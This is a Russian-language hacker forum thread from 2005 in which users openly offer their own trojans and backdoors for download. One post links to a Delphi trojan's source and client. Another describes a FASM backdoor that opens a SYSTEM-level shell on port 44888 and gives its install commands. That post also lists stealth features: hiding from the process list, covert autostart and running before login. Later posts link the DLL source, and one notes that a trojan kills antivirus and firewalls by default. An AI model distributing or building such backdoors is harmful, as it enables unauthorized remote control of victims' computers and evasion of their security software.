Tunnel 0.18 (backdoor)
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
Tunnel 0.18 (backdoor) - 2005-03-28 22:46:35
|
|
|
Art!P
Сообщений: 2
Оценки: 0
Присоединился: 2005-03-28 22:35:09
|
http://ai-tugan.narod.ru/open.rar исходник моего троя и сам трой и описание и клиент написан на дельфи 6. Делфя рулит![sm=thumbs-up.gif]
|
|
|
Tunnel 0.18 (backdoor) - 2005-03-29 20:10:32
|
|
|
Ct757
Сообщений: 135
Оценки: 0
Присоединился: 2005-03-29 19:39:30
|
Чувак, галимый у тебя трой! 75Кб, это ж надо! [sm=6.gif]
Вот мой собственный трой, написан на FASM, открывает shell с правами SYSTEM на порту 44888. Состоит из 2-х частей - библиотеки SERVER.DLL (2Кб), и исталлятора INSTALL.EXE(3Кб). Чтобы установить трой в систему, нужно запустить:
>install.exe -i
чтобы удалить:
>install.exe -u
После инсталляции, ждешь перезагрузки компа, подключаешься через telnet и затем делаешь то, что душе угодно…))
Плюсы моего бэкдора: [+] Не виден в списке процессов (так как загружена всего одна DLL) [+] Скрытый автозапуск (НЕ через паленые ключи Run/RunOnce) [+] Работает даже тогда, когда пользователь уже вышел или ещё не зашел в систему [+] Права SYSTEM [sm=11.gif] [+] Маленький размер и так далее…))
В общем если заинтересовало - http://su4kadll.nm.ru/
|
|
|
Tunnel 0.18 (backdoor) - 2005-03-30 00:54:21
|
|
|
f0gg0t
Сообщений: 38
Оценки: 0
Присоединился: 2004-12-04 12:37:48
|
Почему-то я больше чем уверен что эти два поста принадлежат одному челу )
|
|
|
Tunnel 0.18 (backdoor) - 2005-03-30 09:48:03
|
|
|
Ct757
Сообщений: 135
Оценки: 0
Присоединился: 2005-03-29 19:39:30
|
f0gg0t хош верь, хош нет, ты ошибаешься…
|
|
|
Tunnel 0.18 (backdoor) - 2005-03-30 10:16:56
|
|
|
rgo
Сообщений: 7170
Оценки: 281
Присоединился: 2004-09-25 05:14:25
|
IDA рулит. а все ваши fasm, и дельфи…
|
|
|
Tunnel 0.18 (backdoor) - 2005-03-30 10:54:31
|
|
|
Ct757
Сообщений: 135
Оценки: 0
Присоединился: 2005-03-29 19:39:30
|
IDA - это ж вроде дизасм?…
|
|
|
Tunnel 0.18 (backdoor) - 2005-03-31 23:36:45
|
|
|
_P_I_H_A_R_ агейн!
Сообщений: 206
Оценки: 0
Присоединился: 2005-02-25 16:32:56
|
ану ка оба по подробней свои тварения опишите…………[sm=001.gif]
|
|
|
Tunnel 0.18 (backdoor) - 2005-03-31 23:41:21
|
|
|
_P_I_H_A_R_ агейн!
Сообщений: 206
Оценки: 0
Присоединился: 2005-02-25 16:32:56
|
и кстати-
quote:
—————-<BR>Цитата: Дата:29.03.2005 20:10:32, Автор:Ct757 :: <BR><BR><BR><BR> [+] Не виден в списке процессов (так как загружена всего одна DLL)<BR><BR><BR><BR><BR> —————-
смех
лана, теперь по делу……..
2 Art!P довольно-таки неплохо….но по дефолту мочить….антиаири и фаеры- не есть хорошо!!! 2 Ct757 наличее етой самой диелелки в комплекте так же не есть хорошо! плохо что ты исходники не даешь…………… [sm=001.gif]
|
|
|
Tunnel 0.18 (backdoor) - 2005-04-01 10:18:04
|
|
|
Art!P
Сообщений: 2
Оценки: 0
Присоединился: 2005-03-28 22:35:09
|
Ну дык =)) можно отдельно сделать функцию которая прибивает всё =) или например отдельный процесс прибить =)… вот тока бы дергать из компа список процессов - доставка клиенту
|
|
|
Tunnel 0.18 (backdoor) - 2005-04-01 10:18:41
|
|
|
Ct757
Сообщений: 135
Оценки: 0
Присоединился: 2005-03-29 19:39:30
|
_P_I_H_A_R_ агейн!
Собсно, инсталлятор только устанавливает в систему DLL, в последующем его можно удалить…
Ловите исходник DLL - http://su4kadll.nm.ru/server.asm
|
|
|
|
|